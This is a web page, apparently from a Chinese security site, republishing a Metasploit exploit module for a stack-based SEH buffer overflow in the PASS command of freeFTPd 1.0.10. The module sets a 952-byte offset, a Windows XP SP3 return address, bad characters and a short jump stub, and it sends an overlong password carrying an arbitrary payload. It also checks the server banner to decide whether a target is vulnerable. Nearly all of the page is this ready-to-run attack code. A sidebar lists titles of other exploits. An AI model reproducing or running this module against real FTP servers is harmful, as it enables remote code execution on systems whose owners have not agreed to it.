首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
freeFTPd 1.0.10 PASS Command SEH Overflow (msf)
来源:metasploit.com 作者:Fadzil 发布时间:2013-09-10  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##
   
require 'msf/core'
   
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
   
    include Msf::Exploit::Remote::Ftp
   
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'freeFTPd 1.0.10 PASS Command SEH Overflow',
            'Description'    => %q{
                    This module exploits a SEH stack-based buffer overflow in freeFTPd Server PASS command version 1.0.10.
                credit goes to Wireghoul.
   
            },
            'Author'         =>
                [
                    'Wireghoul - www.justanotherhacker.com', # original poc
                    'Muhamad Fadzil Ramli <fadzil [at] motivsolution.asia>', # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '96517' ],
                    [ 'EDB', '27747' ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'seh'
                },
            'Privileged'     => false,
            'Payload'        =>
                {
                    'Space'    => 600,
                    'BadChars' => "\x00\x20\x0a\x0d",
                    #'DisableNops' => true
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP English SP3',   { 'Ret' => 0x00414226 , 'Offset' => 952 } ],
                ],
            'DisclosureDate' => 'Aug 21 2013',
            'DefaultTarget' => 0))
    end
   
    def check
        connect
        disconnect
   
        if (banner =~ /freeFTPd 1.0/)
            return Exploit::CheckCode::Vulnerable
        end
        Exploit::CheckCode::Safe
    end
   
    def exploit
        connect
   
        payload_size = payload.encoded.length
   
        buf = make_nops(1000)
        buf[(target['Offset']-11) - payload_size, payload_size] = payload.encoded
        buf[target['Offset']-5,5] = "\xe9\x98\xfe\xff\xff"
        buf[target['Offset'],4]   = [0xfffff9eb].pack("V")
        buf[target['Offset']+4,4] = [target.ret].pack("V")
   
        print_status("Sending exploit buffer...")
   
        #buffer = Rex::Text.pattern_create(1000)
        send_user(datastore['FTPUSER'])
        send_pass(buf)
   
        handler
        disconnect
    end
   
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fog Dragonfly 0.8.2 Command In
·HP SiteScope Remote Code Execu
·WinArchiver 3.2 SEH Buffer Ove
·MS13-055 Microsoft Internet Ex
·FuzeZip 1.0 SEH Buffer Overflo
·Watchguard Server Center 11.7.
·PWStore 2010.8.30.0 Cross Site
·eM Client e-mail client v5.0.1
·GreenBrowser 6.4.0515 - Heap O
·MS13-053 Win32k Memory Allocat
·Oracle Java lookUpByteBI - Hea
·Target Longlife Media Player 2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved